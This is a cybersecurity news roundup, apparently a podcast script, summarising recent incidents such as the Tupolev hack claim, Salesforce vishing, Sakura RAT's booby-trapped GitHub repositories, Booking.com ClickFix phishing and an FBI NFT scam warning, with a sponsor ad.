In today’s cybersecurity news…
Ukraine claims cyberattack on Russian bomber maker
Ukraine’s HUR intelligence agency claims it successfully conducted a cyberattack against the Russian state-owned aircraft maker Tupolev, accessing over 4 gigabytes of data with internal communications, meeting notes, and servicing records for strategic bombers. The agency also claimed to have vandalized the company’s website, although it remains down at the time of this recording. This comes days after Ukraine launched a drone offensive against Russian air bases, damaging over 40 long-range bombers.
Vishing campaign targets Salesforce
Researchers at Google’s Threat Intelligence Group disclosed a recent campaign by the threat group UNC6040 which “demonstrated repeated success in breaching networks by having its operators impersonate IT support personnel in convincing telephone-based social engineering engagements.” These vishing attacks attempt to get staff to load a modified version of Salesforce’s Data Loader, usually used for bulk data access on the platform. The attacks use the tool to gain access to Salesforce environments, exfiltrate data, and then pivot to other platforms with the information gathered. Organizations sometimes received extortion attempts months after a breach, indicating a partnership with another party. The researchers found UNC6040 shows signs that it is aligned with the cybercrime collective The Com.
Microsoft lends a hand to European governments
Microsoft launched a new program to offer free cybersecurity services to European governments in an effort to bolster their defenses. This program will include intelligence-sharing on emerging threats and help disrupt attacks underway. The program will consist of three elements: increasing AI-based threat intelligence sharing with European governments, making investments to increase resilience to attacks, and expanding partnerships with governments to better detect and dismantle threat networks.
Lee Enterprises data breach impacts over 39,000
Back in February, the newspaper group Lee Enterprises suffered a data breach, triggering system outages across much of its network of publications. Now in a data breach notification with Maine’s Attorney General, the company disclosed that the breach resulted in the loss of personally identifiable information on 39,779 individuals, although was light on what this included. Lee never attributed the attack to a threat group, but the Qilin ransomware group too credit on its leak site, claiming to have stolen 350 gigabytes of data.
Huge thanks to our sponsor, Conveyor
You know, chasing down SMEs for answers, updating systems, coordinating across teams—all the grunt work nobody wants to do.
Plus, having to finish the dang questionnaire itself.
Well. That teammate exists—Conveyor just launched Sue, the first AI Agent for Customer Trust.
Sue really is the dream teammate. She never misses a deadline, answers every customer request from sales, completes every questionnaire and knocks out all the coordination in-between.
Sue handles it all so you don’t have to. Learn more at www.conveyor.com.
Replay attacks bypass deepfake detection
A new paper from Resemble AI and a team of European academic researchers shows a new method for getting around existing audio deepfake detectors, dubbed a replay attack. This involves generating synthetic speech, playing it over speakers, and rerecording it with actual background noise. On top performing deepfake detection models, this approach increased error rates from 4.7% to 18.2%. Retraining the models based on a specific room tone helped a little, with an 11% error rate. The researchers believe this re-recording removed key artifacts that detection models rely on.
Sakura RAT malware: it’s a trap
Researchers at Sophos found a piece of malware hosted on GitHub called Sakura RAT. Initially this appeared broken, but the code includes a “PreBuild” event that downloads an additional backdoor while compiling. Tracing an email found in the malware, the researchers discovered 133 additional repositories hosting other software with similar silent downloads, ranging from game cheats to hacking tools and crypto utilities. To give an illusion that these projects are actively maintained, the threat actors auto-generated commits with GitHub Actions, following a strict pattern across projects that shows significant coordination. The payloads varied from backdoors to AsyncRAT and Lumma Stealer.
Booking.com, Booking [dot] spoofed
Researchers at Cofense Intelligence spotted a phishing campaign spoofing Booking.com that has been active since November 2024. This campaign emails hotel staff, asking them to respond to guest-related queries, often with time-sensitive lures. These messages use ClickFix to pose as a CAPTCHA, ultimately being used to start a malware download and install a RAT or infostealer. The researchers also found the campaign using cookie consent banners and Cloudflare-style site walls as another means to use ClickFix to download a payload.
FBI warns about NFT scheme
A new advisory from the FBI warns about a new NFT airdrop scheme operating on the Hedera Hashgraph network. Threat actors target victims by sending unsolicited NFTs to a wallet, along with memos asking them to click a URL to claim a reward, but instead send them to phishing pages that ask for wallet seed phrases and passwords. This campaign also uses standard phishing emails, social media ads, and fake sites to draw in victims. The FBI advises verifying any NFT drops from official sources rather than emails. If you’re not familiar, hashgraph is a next-generation distributed ledger introduced in 2018, similar to a blockchain but based on a protocol aimed at speed, scale, and energy efficiency.